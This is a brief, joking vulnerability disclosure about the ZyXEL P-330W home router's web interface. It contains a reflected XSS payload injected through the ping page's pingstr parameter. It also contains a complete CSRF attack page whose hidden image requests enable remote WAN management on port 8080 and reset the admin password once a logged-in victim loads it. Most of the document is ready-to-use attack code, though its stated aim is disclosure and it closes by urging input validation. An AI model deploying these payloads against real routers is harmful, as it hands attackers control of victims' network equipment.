ZyXEL P-330W “Secure Wireless Internet Sharing Router” is vulnerable to multiple XSS and XSRF attacks.
There are a plethora of XSS vulns in the web-based management interface so I'll leave it to you to discover these gifts on your own. Here is a starting point:
http://<router_ip>:<router_port>/ping.asp?pingstr=”><script>alert("M erry Christams")</script>
Additionally, no measures are taken to prevent XSRF so pretty much the whole web-based interface is vulnerable. Here is an example of a web page that if loaded by the victim, turns on remote router management on port 8080 and changes the admin password to "santa_pw":
<html><head><title>Chirstmastime is Here</title></head><body>
<img
src="http://<router_ip>:<router_port>/goform/formRmtMgt?webWanAccess =ON&remoteMgtPort=80
80&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPassT hru3=&
submit-url=%2Fremotemgt.asp" width="0" height="0">
<img
src="http://<router_ip>:<router_port>/goform/formPasswordSetup?usern ame=admin&newpass=santa_pw
&confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0" height="0">
</body>
</html>
Of course, for any of these attacks to be successful the victim has to be recently logged in to the router.
Hope everyone has a Merry Christmas and please don't think Santa is a lamer because he posted XSS and XSRF (hey, I've been busy delivering toys all night and needed a little pick-me-up).
Merry XSSmas, peace on earth, and this year, give the gift of input validation.